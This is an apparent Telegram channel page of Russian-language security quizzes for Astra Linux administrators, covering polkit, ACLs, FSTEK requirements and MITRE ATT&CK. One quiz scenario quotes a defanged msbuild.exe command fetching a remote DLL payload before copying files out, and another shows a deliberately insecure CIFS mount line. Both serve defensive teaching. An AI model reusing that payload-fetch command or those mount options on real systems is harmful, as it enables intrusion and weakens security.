Linux Security
589 subscribers
13 photos
2 videos
17 files
188 links
Неофициальный канал про ОС Astra Linux. Для специалистов по ИБ, пользователей и администраторов.
Download Telegram
#УПД. Это нужно для исполнения правил обращения непривилегированных процессов к привилегированным, оно работает как sudo, но не наделяет процесс пользователя правами администратора, а позволяет точно контролировать, что разрешено и запрещено.
Anonymous Quiz
8%
fly-admin-openvpn-server – «Настройка OpenVPN сервера Fly»
70%
fly-admin-policykit-1 – «Санкции PolicyKit-1»
7%
fly-sosreport – «Центр системных отчетов»
15%
fly-admin-alternatives – «Системные альтернативы»
1
Polkit дополняет существующие системы разрешений в Linux, такие как членство в группах или административные права, не заменяя их. Файлы .rules определяют набор пользователей, указывают на определенные действия из файлов actions, и устанавливают ограничения на выполнение этих действий этими пользователями. Например, файл правил может отменить стандартное требование проходить аутентификацию в качестве администратора для всех пользователей при использовании GParted, указав, что некоторым конкретным пользователям это не требуется. Еще один пример: определенному пользователю может быть запрещено использовать GParted.

https://wiki.ublinux.ru/ru/%D0%98%D1%81%D0%BF%D0%BE%D0%BB%D1%8C%D0%B7%D0%BE%D0%B2%D0%B0%D0%BD%D0%B8%D0%B5/%D0%98%D0%BD%D1%82%D0%B5%D0%B3%D1%80%D0%B0%D1%86%D0%B8%D1%8F/%D0%91%D0%B5%D0%B7%D0%BE%D0%BF%D0%B0%D1%81%D0%BD%D0%BE%D1%81%D1%82%D1%8C/%D0%A0%D0%B0%D0%B1%D0%BE%D1%82%D0%B0_%D1%81_%D0%BF%D0%BE%D0%BB%D0%B8%D1%82%D0%B8%D0%BA%D0%B0%D0%BC%D0%B8_Polkit/%D0%98%D1%81%D0%BF%D0%BE%D0%BB%D1%8C%D0%B7%D0%BE%D0%B2%D0%B0%D0%BD%D0%B8%D0%B5_Polkit
УПД. Какая команда покажет расширенные права доступа как на выводе ниже?

# file: test.txt # owner: root # group: admins user::--- group::r-- #effective:--- mask::-wx other::---
Anonymous Quiz
5%
id
42%
getfacl
24%
ls -l
17%
lsattr
11%
umask -p
При анализе файла конфигурации автомонтирования /etc/fstab
нужно сказать какие параметры небезопасны:
//192.168.50.197/share /opt/share/ cifs noauto,guest,rw,vers=1.0,iocharset=utf8 0 0  
Anonymous Quiz
6%
cifs
17%
noauto и rw
63%
guest и vers=1.0
4%
iocharset=utf8 и 0 0
10%
Все безопасны
Можно ли бесплатно получить лицензию ОС для тестов и разработки ПО под нее?
Anonymous Quiz
74%
Да, в т.ч. физические лица и представители компаний и организаций.
6%
Нет
9%
Да, только если разрабатывается сертифицированное ПО по требованиям ФСТЭК
Аналог МКЦ Astra Linux давно используется в ОС Windows. Подобный вид управления доступом с 2007 г. был внедрен в ОС семейства Microsoft Windows на основе реализации двух механизмов.....
Anonymous Quiz
62%
MIC – Mandatory Integrity Control и UAC – User Account Control
4%
Kerberos и LDAP
7%
Application Guard в Microsoft Defender (MDAG) и Application Guard (AG)
1%
Apparmor и selinux
14%
DAC (Discretionary Access Control) и RBAC (Role-Based Access Control)
6%
BitLocker и Windows defender
7%
Windows SmartScreen и Applocker
У подобных ОС ядро гибридное — оно стоит из множества библиотек (файлы с расширением .dll). Минусом такой компоновки является то, что можно вставить вредоносный код в библиотеки, который будет спокойно работать на уровне ядра. О каких ОС речь?
Anonymous Quiz
8%
ОС семейства Linux
88%
ОС линейки Windows
2%
ОС Android
2%
Mac Os
0%
Типизированные прошивки устройств (firmware)
С прошедшими праздниками!
#УПД. Эта утилита простое решение для создания пользователей и по факту является надстройкой над groupadd, usermod и надстройкой над аналогичной низкоуровневой утилитой для создания пользователей
Anonymous Quiz
47%
useradd
45%
adduser
2%
addbot
5%
Пользователь создаётся после мотивированной заявки согласованной с ИБ, кадрами, бухгалтерии, ИТ....
1%
-givebots <название> и -createhero <название>
Создание пользователя в Linux. Команды adduser и useradd

https://pingvinus.ru/note/useradd
bcrypt — алгоритм на основе шифра Blowfish. Он был создан специально для хеширования паролей и имеет настраиваемый параметр «cost». За что параметр отвечает?
Anonymous Quiz
31%
Параметр отвечает за "соль" в хэше
7%
Цена, которую вы готовы заплатить за перс.данные пользователей
26%
Количество бит хэша
36%
Число раундов хеширования.
Опубликован новый приказ ФСТЭК России 117 взамен аналогичного 17 приказа, посвященный требованиям защиты ГИС. Какая добавилась новая базовая мера защиты?
Anonymous Quiz
33%
Защита виртуализации
26%
Защита контейнеризации
20%
Защита технологий интернета вещей
21%
Защита беспроводных соединений
Приказ ФСТЭК 117.pdf
2.4 MB
Требования о защите информации, содержащейся в ГИС и иных ИС госорганов и госорганизаций

Официально опубликован приказ ФСТЭК России от 11.04.2025 № 117 «Об утверждении Требований о защите информации, содержащейся в государственных информационных системах, иных информационных системах государственных органов, государственных унитарных предприятий, государственных учреждений».
Приказ ФСТЭК № 17 отменяется с 01.03.2026.
👍2
Какие команды нужны для ЗИС.21. Исключение доступа пользователя к инф., возникшей в результате действий предыдущего пользователя через реестры,оперативную пам., внешние запоминающие устройства и иные общие для пользователей ресурсы информационной системы
Anonymous Quiz
14%
1.astra-swapwiper-control enable
15%
2.astra-secdel-control enable
1%
3.astra-nobootmenu-control enable
38%
1 и 2 вариант
4%
2 и 3 вариант
3%
1 и 3 вариант
4%
4 и 7 вариант
20%
Ты обалдел так много вариантов?
1. Cотрудник получил письмо.
2. Открыл файл list.exe, маскирующийся под PDF.
3. На ПК запустился процесс msbuild.exe с аргументами: /tmp:7a1 /payload:https://me[.]xyz/get.dll 4. Процесс подключился к IP и начал копировать файлы. Какая это тактика?
Anonymous Quiz
7%
T1204.001 - Вредоносная ссылка
40%
T1204.002 - Вредоносный файл
19%
T1195.002 - Цепочка поставок компрометирующего программного обеспечения
7%
T1195.001 - Компрометация зависимого программного обеспечения и средств разработки
27%
Нехрен было ставить Винду
Матрица MITRE ATT&CK описывает тактики и техники, которыми злоумышленники пользуются в своих атаках на корпоративную инфраструктуру.

https://mitre.ptsecurity.com/ru-RU

Сервис моделирования от Кода безопасности

https://mitre.securitycode.ru/
Проверка на уязвимости средствами Astra Linux

https://wiki.astralinux.ru/pages/viewpage.action?pageId=331355418